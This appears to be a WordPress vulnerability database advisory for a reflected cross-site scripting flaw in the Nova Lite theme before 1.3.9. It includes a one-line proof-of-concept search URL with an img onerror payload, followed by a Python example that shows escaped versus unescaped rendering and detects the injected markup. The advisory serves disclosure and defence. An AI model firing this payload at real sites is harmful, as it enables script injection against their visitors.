Nova Lite < 1.3.9 - Unauthenticated Reflected Cross-Site Scripting (XSS)
Description
The theme did not properly sanitise the search query, leading to an unauthenticated reflected Cross-Site Scripting issue.
Proof of Concept
/?s=%3Cimg%20src%20onerror=alert(/XSS/)%3E
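The flaw and its fix, modelled in Python as an added example (not code from the Nova Lite theme or from this advisory): it parses the rendered page to check whether the proof-of-concept request above produces a live element. The two render functions and the heading text are hypothetical stand-ins for a search results template; in a WordPress theme the same output encoding is done with functions such as esc_html().

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Request path taken from the Proof of Concept on this page.
POC_PATH = "/?s=%3Cimg%20src%20onerror=alert(/XSS/)%3E"


def search_term(path):
    """Return the URL-decoded `s` parameter, as the server-side code receives it."""
    return parse_qs(urlsplit(path).query).get("s", [""])[0]


def render_unescaped(term):
    # Hypothetical template that echoes the search term as-is (the flaw described).
    return "<h1>Search results for: " + term + "</h1>"


def render_escaped(term):
    # Same hypothetical template with HTML output encoding applied to the term.
    return "<h1>Search results for: " + html.escape(term, quote=True) + "</h1>"


class InjectedMarkupFinder(HTMLParser):
    """Records tags other than the template's own <h1>, plus any on* attribute."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "h1":
            self.findings.append(("tag", tag))
        for name, _ in attrs:
            if name.startswith("on"):
                self.findings.append(("handler", name))


def injected_markup(page):
    """Parse a rendered page and list markup that came from the reflected term."""
    finder = InjectedMarkupFinder()
    finder.feed(page)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    term = search_term(POC_PATH)
    print("unescaped:", injected_markup(render_unescaped(term)))
    print("escaped:  ", injected_markup(render_escaped(term)))
```

The same checker can serve as a regression test after updating the theme: an empty findings list means the reflected term was rendered as text rather than markup.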
Affects Themes
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Talip Karabas
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2020-08-13 (about 3 years ago)
Added
2020-08-13 (about 3 years ago)
Last Updated
2020-08-14 (about 3 years ago)